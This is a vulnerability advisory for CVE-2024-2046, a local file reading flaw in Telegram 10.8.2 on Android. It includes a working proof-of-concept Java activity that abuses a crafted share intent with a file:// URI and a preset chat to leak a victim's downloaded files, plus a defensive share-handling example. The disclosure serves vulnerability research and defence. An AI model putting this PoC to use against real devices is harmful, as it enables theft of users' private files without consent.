Telegram 10.8.2 - LFR via chat attachment
Summary

| Field | Value |
| --- | --- |
| Name | Telegram 10.8.2 - LFR via chat attachment |
| Code name | |
| Product | Telegram |
| Affected versions | Version 10.8.2 |
| State | Public |
| Release date | 2024-03-19 |
Vulnerability

| Field | Value |
| --- | --- |
| Kind | Business information leak |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N |
| CVSSv3.1 Base Score | 4.4 |
| Exploit available | Yes |
| CVE ID(s) | CVE-2024-2046 |
Description
Telegram version 10.8.2 allows obtaining internal files from the user's device without their consent. This is possible because the app is vulnerable to Local File Reading via chat attachments.
Vulnerability
An arbitrary local file reading (LFR) vulnerability has been identified in Telegram. The exploit allows an attacker to obtain internal application files such as documents, images and downloads.
Exploit
```java
// [...]
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.StrictMode;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    // [...]
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // [...]
        // Hacking Here
        // Disable VM policy checks so a file:// URI can be handed to another app
        // (with targetSdk >= 24 the default policy would throw FileUriExposedException).
        StrictMode.setVmPolicy(StrictMode.VmPolicy.LAX);
        // Explicit ACTION_SEND aimed at Telegram's LaunchActivity.
        Intent intent = new Intent("android.intent.action.SEND");
        intent.setClassName("org.telegram.messenger.web", "org.telegram.ui.LaunchActivity");
        // The "attachment" is a path inside Telegram's own download folder,
        // which Telegram opens with its own storage permissions.
        intent.putExtra(Intent.EXTRA_STREAM, Uri.parse("file:///sdcard/Telegram/Telegram Files/test.txt"));
        // Pre-selects the destination chat.
        intent.putExtra("dialogId", (long) 1);
        intent.putExtra(Intent.EXTRA_SUBJECT, "Hacked");
        intent.putExtra(Intent.EXTRA_TEXT, "By cbelloatfluid");
        startActivity(intent);
    }
    // [...]
}
```
Evidence of exploitation
We can see how a malicious application installed on the victim's device can force the user to leak files from the device to a particular contact.
We also studied how to force automatic sending to any Telegram user; however, that requires knowing an internal hash of the victim, which is unpredictable and not exposed.
In short, with a bit of social engineering, a malicious contact could persuade the victim into handing over files from the device without the victim's authorization.
Since Telegram does not allow other apps to obtain its internal files, this exploit uses Telegram itself as a bridge between the attacker and the folder where Telegram stores all the files, images and documents the user downloads from the app.
This way the malicious app never triggers the "Do you authorize the application to access the folder?" prompt, which makes the social engineering far more credible.
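As an added defensive example (not part of this advisory and not Telegram's code), the hypothetical `SharedStreamGuard.checkedStream` helper below shows how an Activity that receives ACTION_SEND can refuse EXTRA_STREAM values that would make the app read its own files on an unknown caller's behalf: file:// URIs like the one in the PoC, and content:// URIs served by one of the app's own providers. The class and method names are assumptions.

```java
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.content.pm.ProviderInfo;
import android.net.Uri;
import android.os.Bundle;
import android.os.Parcelable;
import androidx.appcompat.app.AppCompatActivity;

/** Hypothetical helper (added example, not Telegram's code). */
final class SharedStreamGuard {
    private SharedStreamGuard() {}

    /** Returns the EXTRA_STREAM Uri if it is safe to open for an unknown caller, else null. */
    static Uri checkedStream(Context ctx, Intent intent) {
        Parcelable p = intent.getParcelableExtra(Intent.EXTRA_STREAM);
        if (!(p instanceof Uri)) {
            return null; // Missing or wrong type: nothing to attach.
        }
        Uri uri = (Uri) p;
        // A file:// Uri (as in the advisory's PoC) is opened with the receiving
        // app's own permissions, so the caller can point it at any path we can read.
        if (!ContentResolver.SCHEME_CONTENT.equals(uri.getScheme()) || uri.getAuthority() == null) {
            return null;
        }
        // A content:// Uri served by one of our own providers (e.g. a FileProvider
        // over our download folder) would still hand our files to the caller.
        ProviderInfo pi = ctx.getPackageManager().resolveContentProvider(uri.getAuthority(), 0);
        if (pi == null || ctx.getPackageName().equals(pi.packageName)) {
            return null;
        }
        return uri;
    }
}

/** Hypothetical share target showing where the check belongs. */
public class ShareTargetActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri stream = SharedStreamGuard.checkedStream(this, getIntent());
        if (stream == null) {
            finish(); // Refuse the share instead of attaching the file.
            return;
        }
        // Safe to continue: let the user pick the destination chat; do not
        // trust a caller-supplied "dialogId" extra to preselect it.
        // [...]
    }
}
```

The destination-chat point matters independently of the URI check: the PoC's `dialogId` extra is what turns a local file read into an exfiltration to a contact of the attacker's choosing, so a share that arrives from another app should still require the user to confirm the recipient.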
Our security policy
We have reserved the ID CVE-2024-2046 to refer to this issue from now on.
System Information
- Version: Telegram 10.8.2
- Operating System: Android
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page: https://github.com/DrKLO/Telegram/
Timeline
- 2024-02-29: Vulnerability discovered.
- 2024-02-29: Vendor contacted.
- 2024-03-19: Public disclosure.